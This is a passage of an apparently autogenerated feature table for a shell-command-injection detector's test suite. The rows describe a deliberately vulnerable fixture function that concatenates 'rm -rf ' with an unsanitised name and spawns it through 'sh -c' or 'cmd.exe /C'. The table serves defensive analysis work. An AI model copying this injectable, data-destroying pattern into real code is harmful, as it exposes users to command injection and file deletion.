CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:21:159:22 | cb | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:21:159:22 | cb | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:21:159:22 | cb | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:21:159:22 | cb | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:21:159:22 | cb | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:21:159:22 | cb | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:21:159:22 | cb | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:21:159:22 | cb | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:9 | cmd2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:9 | cmd2 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:9 | cmd2 | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:9 | cmd2 | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:9 | cmd2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:28 | cmd2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:28 | cmd2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:28 | cmd2 | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:28 | cmd2 | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:28 | cmd2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:28 | cmd2 = ... + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:28 | cmd2 = ... + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:28 | cmd2 = ... + name | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:28 | cmd2 = ... + name | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:6:161:28 | cmd2 = ... + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:13:161:21 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:13:161:21 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:13:161:21 | "rm -rf " | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:13:161:21 | "rm -rf " | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:13:161:21 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:13:161:21 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:13:161:28 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:13:161:28 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:13:161:28 | "rm -rf " + name | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:13:161:28 | "rm -rf " + name | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:13:161:28 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:25:161:28 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:25:161:28 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:25:161:28 | name | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:25:161:28 | name | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:25:161:28 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:161:25:161:28 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:10 | args2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:10 | args2 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:10 | args2 | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:10 | args2 | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:10 | args2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:19 | args2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:19 | args2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:19 | args2 | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:19 | args2 | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:19 | args2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:19 | args2 = [cmd2] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:19 | args2 = [cmd2] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:19 | args2 = [cmd2] | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:19 | args2 = [cmd2] | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:6:162:19 | args2 = [cmd2] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:14:162:19 | [cmd2] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:14:162:19 | [cmd2] | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:14:162:19 | [cmd2] | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:14:162:19 | [cmd2] | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:14:162:19 | [cmd2] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:15:162:18 | cmd2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:15:162:18 | cmd2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:15:162:18 | cmd2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:15:162:18 | cmd2 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:15:162:18 | cmd2 | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:15:162:18 | cmd2 | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:15:162:18 | cmd2 | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:15:162:18 | cmd2 | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:15:162:18 | cmd2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:162:15:162:18 | cmd2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:163:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:163:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:163:3 | cp | enclosingFunctionBody | name cmd name sh sh args -c cmd cp spawn sh args cb cmd2 rm -rf name args2 cmd2 cp spawn cmd.exe /C editor concat args2 stdio inherit | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:163:3 | cp | enclosingFunctionName | indirect2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:163:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:163:9 | cp.spawn | contextFunctionInterfaces | 